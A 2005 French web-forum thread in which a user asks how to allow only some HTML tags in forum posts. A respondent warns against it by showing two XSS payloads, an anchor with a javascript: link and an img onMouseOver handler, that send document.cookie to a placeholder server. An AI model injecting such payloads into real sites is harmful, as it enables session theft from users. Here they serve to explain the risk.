html dans form
Salut à tous,
Suivant les chers conseils de rex j'autorise le HTML dans mon forum putôt que les bbcodes vu que je m'adresse à des habitués du HTML.
Seulement voila je vousrais inerdire certaines balises dic, body... mais je n'ay arrive pas avec le regex dès que l'utilisateur y ajoute des propriétés.
Exemple: je sopppe bien le <div> mais pas le <div prop="titi" class="toto"...>
Et je n'arrive pas non plus à vérifier que toute les balises sont fermées(même un <i> pas fermé ça fout en l'air le site...
Ca fait un paquet de problèmes mais je m'arrche les cheveux.
c 'est incroyable ce que je peux écrire comme conneries
le 25/04/2005 à 12:04
Bzh
Sincèrement !!!! La faille XSS peut être une faille très dangereuse si elle est bien utilisé !!!
Déja, faire un BB-code sans faille n' est pas facile !!!
Mais là encore pire... Je te souhaite bon courage...
ps: si le BB-code existe, c' est qu' il y a bien une raison...
faille XSS? mais comment si on autorise que certaines balises?
c 'est incroyable ce que je peux écrire comme conneries
le 25/04/2005 à 13:49
Bzh
par exemple, tu vas bien être obligé d' accepter la balise '<a href="">Cliquez ici</a>'
Bon bin =>
<a href="javascript:window.location = 'http://ton_serveur/index.php?cookies='+document.cookie;">Cliquez ici</a>
Ou bien avec la balise img =>
<img src="adresse de l' image" onMouseOver="javascript:window.location = 'http://ton_serveur/index.php?cookies='+document.cookie;">*
Evidement que tu peux te protèger !!! Mais là ça se complique vraiment beaucoup !!!
Je te le redis, si le BB-code existe il y a bien une raison à cela !!!
Bye...
Ah ouaip merci j'y pense pour la suite je reste ave mon bon vieux BBcodes
c 'est incroyable ce que je peux écrire comme conneries
le 25/04/2005 à 13:55
Bzh
Parcontre ça peut être un très bon exercice pour les expressions régulières !!!
A toi de voir !!!
Ouiap c'est ce que j'avais vu mais comme les failles possibles sont nombreuses et qu'en terme de sécurité je débute je vais m'abstenir pour le moment...
c 'est incroyable ce que je peux écrire comme conneries
le 25/04/2005 à 14:28
Bzh
J' ai fait un petit tour sur ton site...
Le site est très acceuillant, la navigation est facile et le design est plutot réussi !!!
Parcontre, avec firefox, le menu à quelques petits problèmes...
Rassure toi, rien de très grave...
Bye...
Ecrire un message
Votre message vient d'être créé avec succès.
BB-Code
Pour insérer une URL clickable
Pour insérer une adresse E-mail
Pour annoter
Pour écrire du code
Pour faire un lien vers une fonction PHP
Pour écrire du texte préformaté
Pour écrire du texte en gras
Pour écrire du texte en italique
Pour écrire du texte souligné
Pour écrire du texte barré
Pour écrire un titre principal
Pour écrire un titre secondaire
Pour écrire une liste
Smiley
:bond:
:boxe:
:bsmile:
:bump:
:clap:
:coeur:
:cool:
:cry:
:eek:
:evil:
:fleur:
:fou2:
:fou:
:grin:
:grrr:
:hammer:
:hippy:
:hum:
:idee2:
:idee:
:kdo:
:king:
:ko:
:lol:
:love2:
:love:
:mad:
:maitre:
:noel:
:oops:
:raa:
:razz:
:roll:
:sad:
:skull:
:smile:
:timide:
:trink:
:vice:
:vomi:
:wink:
:zzz:
